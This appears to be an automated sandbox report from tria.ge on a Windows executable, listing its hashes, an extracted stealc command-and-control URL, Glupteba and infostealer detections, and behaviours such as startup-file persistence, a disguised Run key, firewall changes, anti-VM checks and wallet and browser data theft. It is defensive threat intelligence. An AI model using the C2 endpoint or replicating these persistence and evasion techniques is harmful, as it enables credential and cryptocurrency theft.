Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
106s -
max time network
158s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
19/03/2024, 02:57
Static task
static1
Behavioral task
behavioral1
Sample
da08f38fa649643f410f14811c7e3cec28c7aaf5b98ab06bae942695e15a30c6.exe
Resource
win7-20240221-en
General
-
Target
da08f38fa649643f410f14811c7e3cec28c7aaf5b98ab06bae942695e15a30c6.exe
-
Size
4.0MB
-
MD5
e3255b216748070e4bc397405fdf6fad
-
SHA1
aac9ba5c1a98faa2f03a20cc39b6afdb72f3a2d4
-
SHA256
da08f38fa649643f410f14811c7e3cec28c7aaf5b98ab06bae942695e15a30c6
-
SHA512
949edc571c1a944b1ce872611842ee5f9a27cda3d349207b48a57f318d31643bc514bec62cb81e0365ce58c10a4fb2b0ea26e745b013760be2d8b28768f38a2d
-
SSDEEP
49152:/FL8Xf6qIED5X0MJEJsaoSo5dqqlg+egF0ty6H4NhGKjmuU5JN:69n4ojqV00Z
Malware Config
Extracted
stealc
http://185.172.128.145
-
url_path
/3cd2b41cbde8fc9c.php
Signatures
-
Glupteba payload 21 IoCs
resource yara_rule behavioral2/memory/3308-132-0x00000000051E0000-0x0000000005ACB000-memory.dmp family_glupteba behavioral2/memory/1124-134-0x0000000000400000-0x0000000003131000-memory.dmp family_glupteba behavioral2/memory/3308-135-0x0000000000400000-0x0000000003131000-memory.dmp family_glupteba behavioral2/memory/3664-142-0x0000000005160000-0x0000000005A4B000-memory.dmp family_glupteba behavioral2/memory/3664-153-0x0000000000400000-0x0000000003131000-memory.dmp family_glupteba behavioral2/memory/428-167-0x0000000000400000-0x0000000003131000-memory.dmp family_glupteba behavioral2/memory/428-183-0x0000000000400000-0x0000000003131000-memory.dmp family_glupteba behavioral2/memory/1124-184-0x0000000000400000-0x0000000003131000-memory.dmp family_glupteba behavioral2/memory/3308-216-0x0000000000400000-0x0000000003131000-memory.dmp family_glupteba behavioral2/memory/3664-236-0x0000000000400000-0x0000000003131000-memory.dmp family_glupteba behavioral2/memory/428-282-0x0000000000400000-0x0000000003131000-memory.dmp family_glupteba behavioral2/memory/1124-290-0x0000000000400000-0x0000000003131000-memory.dmp family_glupteba behavioral2/memory/3308-291-0x0000000000400000-0x0000000003131000-memory.dmp family_glupteba behavioral2/memory/3664-293-0x0000000000400000-0x0000000003131000-memory.dmp family_glupteba behavioral2/memory/428-369-0x0000000000400000-0x0000000003131000-memory.dmp family_glupteba behavioral2/memory/1124-383-0x0000000000400000-0x0000000003131000-memory.dmp family_glupteba behavioral2/memory/1124-471-0x0000000000400000-0x0000000003131000-memory.dmp family_glupteba behavioral2/memory/3308-461-0x0000000000400000-0x0000000003131000-memory.dmp family_glupteba behavioral2/memory/3664-469-0x0000000000400000-0x0000000003131000-memory.dmp family_glupteba behavioral2/memory/6040-543-0x0000000000400000-0x0000000003131000-memory.dmp family_glupteba behavioral2/memory/428-547-0x0000000000400000-0x0000000003131000-memory.dmp family_glupteba -
Detect binaries embedding considerable number of MFA browser extension IDs. 4 IoCs
resource yara_rule behavioral2/memory/4724-175-0x0000000000400000-0x0000000002D4D000-memory.dmp INDICATOR_SUSPICIOUS_Binary_Embedded_MFA_Browser_Extension_IDs behavioral2/memory/4724-177-0x0000000002EF0000-0x0000000002FF0000-memory.dmp INDICATOR_SUSPICIOUS_Binary_Embedded_MFA_Browser_Extension_IDs behavioral2/memory/4724-243-0x0000000000400000-0x0000000002D4D000-memory.dmp INDICATOR_SUSPICIOUS_Binary_Embedded_MFA_Browser_Extension_IDs behavioral2/memory/4724-297-0x0000000000400000-0x0000000002D4D000-memory.dmp INDICATOR_SUSPICIOUS_Binary_Embedded_MFA_Browser_Extension_IDs -
Detect binaries embedding considerable number of cryptocurrency wallet browser extension IDs. 4 IoCs
resource yara_rule behavioral2/memory/4724-175-0x0000000000400000-0x0000000002D4D000-memory.dmp INDICATOR_SUSPICIOUS_Binary_Embedded_Crypto_Wallet_Browser_Extension_IDs behavioral2/memory/4724-177-0x0000000002EF0000-0x0000000002FF0000-memory.dmp INDICATOR_SUSPICIOUS_Binary_Embedded_Crypto_Wallet_Browser_Extension_IDs behavioral2/memory/4724-243-0x0000000000400000-0x0000000002D4D000-memory.dmp INDICATOR_SUSPICIOUS_Binary_Embedded_Crypto_Wallet_Browser_Extension_IDs behavioral2/memory/4724-297-0x0000000000400000-0x0000000002D4D000-memory.dmp INDICATOR_SUSPICIOUS_Binary_Embedded_Crypto_Wallet_Browser_Extension_IDs -
Detects Windows executables referencing non-Windows User-Agents 19 IoCs
resource yara_rule behavioral2/memory/1124-134-0x0000000000400000-0x0000000003131000-memory.dmp INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA behavioral2/memory/3308-135-0x0000000000400000-0x0000000003131000-memory.dmp INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA behavioral2/memory/3664-153-0x0000000000400000-0x0000000003131000-memory.dmp INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA behavioral2/memory/428-167-0x0000000000400000-0x0000000003131000-memory.dmp INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA behavioral2/memory/428-183-0x0000000000400000-0x0000000003131000-memory.dmp INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA behavioral2/memory/1124-184-0x0000000000400000-0x0000000003131000-memory.dmp INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA behavioral2/memory/3308-216-0x0000000000400000-0x0000000003131000-memory.dmp INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA behavioral2/memory/3664-236-0x0000000000400000-0x0000000003131000-memory.dmp INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA behavioral2/memory/428-282-0x0000000000400000-0x0000000003131000-memory.dmp INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA behavioral2/memory/1124-290-0x0000000000400000-0x0000000003131000-memory.dmp INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA behavioral2/memory/3308-291-0x0000000000400000-0x0000000003131000-memory.dmp INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA behavioral2/memory/3664-293-0x0000000000400000-0x0000000003131000-memory.dmp INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA behavioral2/memory/428-369-0x0000000000400000-0x0000000003131000-memory.dmp INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA behavioral2/memory/1124-383-0x0000000000400000-0x0000000003131000-memory.dmp INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA behavioral2/memory/1124-471-0x0000000000400000-0x0000000003131000-memory.dmp INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA behavioral2/memory/3308-461-0x0000000000400000-0x0000000003131000-memory.dmp INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA behavioral2/memory/3664-469-0x0000000000400000-0x0000000003131000-memory.dmp INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA behavioral2/memory/6040-543-0x0000000000400000-0x0000000003131000-memory.dmp INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA behavioral2/memory/428-547-0x0000000000400000-0x0000000003131000-memory.dmp INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA -
Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers. 3 IoCs
resource yara_rule behavioral2/memory/4724-175-0x0000000000400000-0x0000000002D4D000-memory.dmp INDICATOR_SUSPICIOUS_Binary_References_Browsers behavioral2/memory/4724-243-0x0000000000400000-0x0000000002D4D000-memory.dmp INDICATOR_SUSPICIOUS_Binary_References_Browsers behavioral2/memory/4724-297-0x0000000000400000-0x0000000002D4D000-memory.dmp INDICATOR_SUSPICIOUS_Binary_References_Browsers -
Detects executables (downlaoders) containing URLs to raw contents of a paste 1 IoCs
resource yara_rule behavioral2/memory/2068-0-0x0000000000400000-0x0000000000408000-memory.dmp INDICATOR_SUSPICIOUS_EXE_RawPaste_URL -
Detects executables Discord URL observed in first stage droppers 19 IoCs
resource yara_rule behavioral2/memory/1124-134-0x0000000000400000-0x0000000003131000-memory.dmp INDICATOR_SUSPICIOUS_EXE_DiscordURL behavioral2/memory/3308-135-0x0000000000400000-0x0000000003131000-memory.dmp INDICATOR_SUSPICIOUS_EXE_DiscordURL behavioral2/memory/3664-153-0x0000000000400000-0x0000000003131000-memory.dmp INDICATOR_SUSPICIOUS_EXE_DiscordURL behavioral2/memory/428-167-0x0000000000400000-0x0000000003131000-memory.dmp INDICATOR_SUSPICIOUS_EXE_DiscordURL behavioral2/memory/428-183-0x0000000000400000-0x0000000003131000-memory.dmp INDICATOR_SUSPICIOUS_EXE_DiscordURL behavioral2/memory/1124-184-0x0000000000400000-0x0000000003131000-memory.dmp INDICATOR_SUSPICIOUS_EXE_DiscordURL behavioral2/memory/3308-216-0x0000000000400000-0x0000000003131000-memory.dmp INDICATOR_SUSPICIOUS_EXE_DiscordURL behavioral2/memory/3664-236-0x0000000000400000-0x0000000003131000-memory.dmp INDICATOR_SUSPICIOUS_EXE_DiscordURL behavioral2/memory/428-282-0x0000000000400000-0x0000000003131000-memory.dmp INDICATOR_SUSPICIOUS_EXE_DiscordURL behavioral2/memory/1124-290-0x0000000000400000-0x0000000003131000-memory.dmp INDICATOR_SUSPICIOUS_EXE_DiscordURL behavioral2/memory/3308-291-0x0000000000400000-0x0000000003131000-memory.dmp INDICATOR_SUSPICIOUS_EXE_DiscordURL behavioral2/memory/3664-293-0x0000000000400000-0x0000000003131000-memory.dmp INDICATOR_SUSPICIOUS_EXE_DiscordURL behavioral2/memory/428-369-0x0000000000400000-0x0000000003131000-memory.dmp INDICATOR_SUSPICIOUS_EXE_DiscordURL behavioral2/memory/1124-383-0x0000000000400000-0x0000000003131000-memory.dmp INDICATOR_SUSPICIOUS_EXE_DiscordURL behavioral2/memory/1124-471-0x0000000000400000-0x0000000003131000-memory.dmp INDICATOR_SUSPICIOUS_EXE_DiscordURL behavioral2/memory/3308-461-0x0000000000400000-0x0000000003131000-memory.dmp INDICATOR_SUSPICIOUS_EXE_DiscordURL behavioral2/memory/3664-469-0x0000000000400000-0x0000000003131000-memory.dmp INDICATOR_SUSPICIOUS_EXE_DiscordURL behavioral2/memory/6040-543-0x0000000000400000-0x0000000003131000-memory.dmp INDICATOR_SUSPICIOUS_EXE_DiscordURL behavioral2/memory/428-547-0x0000000000400000-0x0000000003131000-memory.dmp INDICATOR_SUSPICIOUS_EXE_DiscordURL -
Detects executables containing URLs to raw contents of a Github gist 19 IoCs
resource yara_rule behavioral2/memory/1124-134-0x0000000000400000-0x0000000003131000-memory.dmp INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL behavioral2/memory/3308-135-0x0000000000400000-0x0000000003131000-memory.dmp INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL behavioral2/memory/3664-153-0x0000000000400000-0x0000000003131000-memory.dmp INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL behavioral2/memory/428-167-0x0000000000400000-0x0000000003131000-memory.dmp INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL behavioral2/memory/428-183-0x0000000000400000-0x0000000003131000-memory.dmp INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL behavioral2/memory/1124-184-0x0000000000400000-0x0000000003131000-memory.dmp INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL behavioral2/memory/3308-216-0x0000000000400000-0x0000000003131000-memory.dmp INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL behavioral2/memory/3664-236-0x0000000000400000-0x0000000003131000-memory.dmp INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL behavioral2/memory/428-282-0x0000000000400000-0x0000000003131000-memory.dmp INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL behavioral2/memory/1124-290-0x0000000000400000-0x0000000003131000-memory.dmp INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL behavioral2/memory/3308-291-0x0000000000400000-0x0000000003131000-memory.dmp INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL behavioral2/memory/3664-293-0x0000000000400000-0x0000000003131000-memory.dmp INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL behavioral2/memory/428-369-0x0000000000400000-0x0000000003131000-memory.dmp INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL behavioral2/memory/1124-383-0x0000000000400000-0x0000000003131000-memory.dmp INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL behavioral2/memory/1124-471-0x0000000000400000-0x0000000003131000-memory.dmp INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL behavioral2/memory/3308-461-0x0000000000400000-0x0000000003131000-memory.dmp INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL behavioral2/memory/3664-469-0x0000000000400000-0x0000000003131000-memory.dmp INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL behavioral2/memory/6040-543-0x0000000000400000-0x0000000003131000-memory.dmp INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL behavioral2/memory/428-547-0x0000000000400000-0x0000000003131000-memory.dmp INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL -
Detects executables containing artifacts associated with disabling Widnows Defender 19 IoCs
resource yara_rule behavioral2/memory/1124-134-0x0000000000400000-0x0000000003131000-memory.dmp INDICATOR_SUSPICIOUS_DisableWinDefender behavioral2/memory/3308-135-0x0000000000400000-0x0000000003131000-memory.dmp INDICATOR_SUSPICIOUS_DisableWinDefender behavioral2/memory/3664-153-0x0000000000400000-0x0000000003131000-memory.dmp INDICATOR_SUSPICIOUS_DisableWinDefender behavioral2/memory/428-167-0x0000000000400000-0x0000000003131000-memory.dmp INDICATOR_SUSPICIOUS_DisableWinDefender behavioral2/memory/428-183-0x0000000000400000-0x0000000003131000-memory.dmp INDICATOR_SUSPICIOUS_DisableWinDefender behavioral2/memory/1124-184-0x0000000000400000-0x0000000003131000-memory.dmp INDICATOR_SUSPICIOUS_DisableWinDefender behavioral2/memory/3308-216-0x0000000000400000-0x0000000003131000-memory.dmp INDICATOR_SUSPICIOUS_DisableWinDefender behavioral2/memory/3664-236-0x0000000000400000-0x0000000003131000-memory.dmp INDICATOR_SUSPICIOUS_DisableWinDefender behavioral2/memory/428-282-0x0000000000400000-0x0000000003131000-memory.dmp INDICATOR_SUSPICIOUS_DisableWinDefender behavioral2/memory/1124-290-0x0000000000400000-0x0000000003131000-memory.dmp INDICATOR_SUSPICIOUS_DisableWinDefender behavioral2/memory/3308-291-0x0000000000400000-0x0000000003131000-memory.dmp INDICATOR_SUSPICIOUS_DisableWinDefender behavioral2/memory/3664-293-0x0000000000400000-0x0000000003131000-memory.dmp INDICATOR_SUSPICIOUS_DisableWinDefender behavioral2/memory/428-369-0x0000000000400000-0x0000000003131000-memory.dmp INDICATOR_SUSPICIOUS_DisableWinDefender behavioral2/memory/1124-383-0x0000000000400000-0x0000000003131000-memory.dmp INDICATOR_SUSPICIOUS_DisableWinDefender behavioral2/memory/1124-471-0x0000000000400000-0x0000000003131000-memory.dmp INDICATOR_SUSPICIOUS_DisableWinDefender behavioral2/memory/3308-461-0x0000000000400000-0x0000000003131000-memory.dmp INDICATOR_SUSPICIOUS_DisableWinDefender behavioral2/memory/3664-469-0x0000000000400000-0x0000000003131000-memory.dmp INDICATOR_SUSPICIOUS_DisableWinDefender behavioral2/memory/6040-543-0x0000000000400000-0x0000000003131000-memory.dmp INDICATOR_SUSPICIOUS_DisableWinDefender behavioral2/memory/428-547-0x0000000000400000-0x0000000003131000-memory.dmp INDICATOR_SUSPICIOUS_DisableWinDefender -
Detects executables packed with VMProtect. 7 IoCs
resource yara_rule behavioral2/memory/4336-112-0x0000000000400000-0x00000000005E7000-memory.dmp INDICATOR_EXE_Packed_VMProtect behavioral2/memory/4336-125-0x0000000000400000-0x00000000005E7000-memory.dmp INDICATOR_EXE_Packed_VMProtect behavioral2/memory/4336-113-0x0000000000400000-0x00000000005E7000-memory.dmp INDICATOR_EXE_Packed_VMProtect behavioral2/memory/2608-171-0x0000000000400000-0x00000000005E7000-memory.dmp INDICATOR_EXE_Packed_VMProtect behavioral2/memory/2608-242-0x0000000000400000-0x00000000005E7000-memory.dmp INDICATOR_EXE_Packed_VMProtect behavioral2/memory/2608-295-0x0000000000400000-0x00000000005E7000-memory.dmp INDICATOR_EXE_Packed_VMProtect behavioral2/memory/2608-392-0x0000000000400000-0x00000000005E7000-memory.dmp INDICATOR_EXE_Packed_VMProtect -
Detects executables referencing many varying, potentially fake Windows User-Agents 19 IoCs
resource yara_rule behavioral2/memory/1124-134-0x0000000000400000-0x0000000003131000-memory.dmp INDICATOR_SUSPICIOUS_EXE_TooManyWindowsUA behavioral2/memory/3308-135-0x0000000000400000-0x0000000003131000-memory.dmp INDICATOR_SUSPICIOUS_EXE_TooManyWindowsUA behavioral2/memory/3664-153-0x0000000000400000-0x0000000003131000-memory.dmp INDICATOR_SUSPICIOUS_EXE_TooManyWindowsUA behavioral2/memory/428-167-0x0000000000400000-0x0000000003131000-memory.dmp INDICATOR_SUSPICIOUS_EXE_TooManyWindowsUA behavioral2/memory/428-183-0x0000000000400000-0x0000000003131000-memory.dmp INDICATOR_SUSPICIOUS_EXE_TooManyWindowsUA behavioral2/memory/1124-184-0x0000000000400000-0x0000000003131000-memory.dmp INDICATOR_SUSPICIOUS_EXE_TooManyWindowsUA behavioral2/memory/3308-216-0x0000000000400000-0x0000000003131000-memory.dmp INDICATOR_SUSPICIOUS_EXE_TooManyWindowsUA behavioral2/memory/3664-236-0x0000000000400000-0x0000000003131000-memory.dmp INDICATOR_SUSPICIOUS_EXE_TooManyWindowsUA behavioral2/memory/428-282-0x0000000000400000-0x0000000003131000-memory.dmp INDICATOR_SUSPICIOUS_EXE_TooManyWindowsUA behavioral2/memory/1124-290-0x0000000000400000-0x0000000003131000-memory.dmp INDICATOR_SUSPICIOUS_EXE_TooManyWindowsUA behavioral2/memory/3308-291-0x0000000000400000-0x0000000003131000-memory.dmp INDICATOR_SUSPICIOUS_EXE_TooManyWindowsUA behavioral2/memory/3664-293-0x0000000000400000-0x0000000003131000-memory.dmp INDICATOR_SUSPICIOUS_EXE_TooManyWindowsUA behavioral2/memory/428-369-0x0000000000400000-0x0000000003131000-memory.dmp INDICATOR_SUSPICIOUS_EXE_TooManyWindowsUA behavioral2/memory/1124-383-0x0000000000400000-0x0000000003131000-memory.dmp INDICATOR_SUSPICIOUS_EXE_TooManyWindowsUA behavioral2/memory/1124-471-0x0000000000400000-0x0000000003131000-memory.dmp INDICATOR_SUSPICIOUS_EXE_TooManyWindowsUA behavioral2/memory/3308-461-0x0000000000400000-0x0000000003131000-memory.dmp INDICATOR_SUSPICIOUS_EXE_TooManyWindowsUA behavioral2/memory/3664-469-0x0000000000400000-0x0000000003131000-memory.dmp INDICATOR_SUSPICIOUS_EXE_TooManyWindowsUA behavioral2/memory/6040-543-0x0000000000400000-0x0000000003131000-memory.dmp INDICATOR_SUSPICIOUS_EXE_TooManyWindowsUA behavioral2/memory/428-547-0x0000000000400000-0x0000000003131000-memory.dmp INDICATOR_SUSPICIOUS_EXE_TooManyWindowsUA -
UPX dump on OEP (original entry point) 16 IoCs
resource yara_rule behavioral2/files/0x0008000000023266-193.dat UPX behavioral2/files/0x0008000000023266-208.dat UPX behavioral2/files/0x0008000000023266-207.dat UPX behavioral2/memory/5084-257-0x0000000000400000-0x0000000000930000-memory.dmp UPX behavioral2/memory/5084-300-0x0000000000400000-0x0000000000930000-memory.dmp UPX behavioral2/files/0x0009000000023280-311.dat UPX behavioral2/memory/2472-328-0x0000000000C30000-0x0000000001168000-memory.dmp UPX behavioral2/memory/212-329-0x0000000000C30000-0x0000000001168000-memory.dmp UPX behavioral2/files/0x000700000002328c-368.dat UPX behavioral2/memory/5256-378-0x00000000002F0000-0x0000000000828000-memory.dmp UPX behavioral2/files/0x0007000000023295-373.dat UPX behavioral2/files/0x0009000000023280-384.dat UPX behavioral2/files/0x0009000000023280-388.dat UPX behavioral2/memory/5440-434-0x0000000000C30000-0x0000000001168000-memory.dmp UPX behavioral2/memory/5216-432-0x0000000000400000-0x0000000000930000-memory.dmp UPX behavioral2/memory/5216-443-0x0000000000400000-0x0000000000930000-memory.dmp UPX -
Downloads MZ/PE file
-
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 3708 netsh.exe 5864 netsh.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe -
Checks computer location settings 2 TTPs 5 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation DGDAEHCBGI.exe Key value queried \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation UNAhnkHQ34vsYuu3ggHNYRmg.exe Key value queried \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation Install.exe Key value queried \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation Install.exe Key value queried \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation u2ls.0.exe -
Drops startup file 12 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mdgLP7dY9njhwe08toZPvGZN.bat jsc.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9ETvjpraw8qwcdeQaEpPMDlU.bat jsc.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bnv2nyl0xlEeFO3b6uR39eyN.bat jsc.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3VXkvJwIdAPjetmC2XdlkJyO.bat jsc.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\njFDBkzCkeS525acBCLOeMuR.bat jsc.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UP4QQFUbNX1Xenno6Ibix4q4.bat jsc.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8qFNTxWtWcrcVXqj7K3d3TZJ.bat jsc.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DH0Jyhgh5qUGtVzYHkvgx1DW.bat jsc.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\uBH8iCa6TuR3JuM9ZmGWKDz4.bat jsc.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6IuzPIT6F0RH8vBuS7B3oGmx.bat jsc.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QqNmKjWP7mCB0vtS9GBhwVWX.bat jsc.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZE6c79ISk0BoLB9GkY7cC16F.bat jsc.exe -
Executes dropped EXE 32 IoCs
pid Process 3376 UNAhnkHQ34vsYuu3ggHNYRmg.exe 4948 BOValDiVDjiQWzr6UN6p6jA7.exe 436 BOValDiVDjiQWzr6UN6p6jA7.tmp 428 wZuArslZHWkceXKudkk2iDCR.exe 1124 zFFFw4OHExPBcLGvnue2mRJZ.exe 3308 xCnC3kRGjYzKzgztZzTB60s2.exe 4336 djedit.exe 3664 L7msUYWEb0w2cAnBCZdJMuLo.exe 2608 djedit.exe 3636 wiv9T1pqAf4f2oHhfWycBzc5.exe 4724 u2ls.0.exe 4020 wfplwfs.exe 2604 P3JBDfWsxH7gfXrVpC5Da95h.exe 5084 u2ls.1.exe 2368 syncUpd.exe 2472 JVj1qEtdxsUSRfq6lUYWP1us.exe 212 JVj1qEtdxsUSRfq6lUYWP1us.exe 5216 BroomSetup.exe 5256 JVj1qEtdxsUSRfq6lUYWP1us.exe 5440 JVj1qEtdxsUSRfq6lUYWP1us.exe 5544 JVj1qEtdxsUSRfq6lUYWP1us.exe 6016 xCnC3kRGjYzKzgztZzTB60s2.exe 6032 zFFFw4OHExPBcLGvnue2mRJZ.exe 6040 L7msUYWEb0w2cAnBCZdJMuLo.exe 5336 vedpmmRXAXSZuq7UqKOIe4r1.exe 4484 Install.exe 3504 ePj0Q3IAwol0xi3TP0p4YL3U.exe 5408 Install.exe 6100 Install.exe 1304 Install.exe 6072 wZuArslZHWkceXKudkk2iDCR.exe 1540 DGDAEHCBGI.exe -
Loads dropped DLL 10 IoCs
pid Process 436 BOValDiVDjiQWzr6UN6p6jA7.tmp 2604 P3JBDfWsxH7gfXrVpC5Da95h.exe 2604 P3JBDfWsxH7gfXrVpC5Da95h.exe 2472 JVj1qEtdxsUSRfq6lUYWP1us.exe 212 JVj1qEtdxsUSRfq6lUYWP1us.exe 4724 u2ls.0.exe 4724 u2ls.0.exe 5256 JVj1qEtdxsUSRfq6lUYWP1us.exe 5440 JVj1qEtdxsUSRfq6lUYWP1us.exe 5544 JVj1qEtdxsUSRfq6lUYWP1us.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral2/files/0x0008000000023266-193.dat upx behavioral2/files/0x0008000000023266-208.dat upx behavioral2/files/0x0008000000023266-207.dat upx behavioral2/memory/5084-257-0x0000000000400000-0x0000000000930000-memory.dmp upx behavioral2/memory/5084-300-0x0000000000400000-0x0000000000930000-memory.dmp upx behavioral2/files/0x0009000000023280-311.dat upx behavioral2/memory/2472-328-0x0000000000C30000-0x0000000001168000-memory.dmp upx behavioral2/memory/212-329-0x0000000000C30000-0x0000000001168000-memory.dmp upx behavioral2/files/0x000700000002328c-368.dat upx behavioral2/memory/5256-378-0x00000000002F0000-0x0000000000828000-memory.dmp upx behavioral2/files/0x0007000000023295-373.dat upx behavioral2/files/0x0009000000023280-384.dat upx behavioral2/files/0x0009000000023280-388.dat upx behavioral2/memory/5440-434-0x0000000000C30000-0x0000000001168000-memory.dmp upx behavioral2/memory/5216-432-0x0000000000400000-0x0000000000930000-memory.dmp upx behavioral2/memory/5216-443-0x0000000000400000-0x0000000000930000-memory.dmp upx -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Ledger-Live Updater = "C:\\Users\\Admin\\AppData\\Local\\Temp\\DGDAEHCBGI.exe" DGDAEHCBGI.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 4 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\D: JVj1qEtdxsUSRfq6lUYWP1us.exe File opened (read-only) \??\F: JVj1qEtdxsUSRfq6lUYWP1us.exe File opened (read-only) \??\D: JVj1qEtdxsUSRfq6lUYWP1us.exe File opened (read-only) \??\F: JVj1qEtdxsUSRfq6lUYWP1us.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
flow ioc 28 pastebin.com 38 bitbucket.org 49 bitbucket.org 25 pastebin.com -
Drops file in System32 directory 6 IoCs
description ioc Process File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache powershell.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini Install.exe -
Suspicious use of SetThreadContext 6 IoCs
description pid Process procid_target PID 2128 set thread context of 2068 2128 da08f38fa649643f410f14811c7e3cec28c7aaf5b98ab06bae942695e15a30c6.exe 92 PID 4020 set thread context of 5076 4020 wfplwfs.exe 122 PID 4020 set thread context of 5004 4020 wfplwfs.exe 185 PID 4020 set thread context of 2084 4020 wfplwfs.exe 165 PID 4020 set thread context of 5220 4020 wfplwfs.exe 200 PID 4020 set thread context of 4452 4020 wfplwfs.exe 212 -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
description ioc Process File opened (read-only) \??\VBoxMiniRdrDN L7msUYWEb0w2cAnBCZdJMuLo.exe File opened (read-only) \??\VBoxMiniRdrDN wZuArslZHWkceXKudkk2iDCR.exe -
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\Tasks\bkigDFRrkKahyaAEgB.job schtasks.exe File created C:\Windows\Tasks\469e1aba41e3631f.job wfplwfs.exe -
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4860 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 14 IoCs
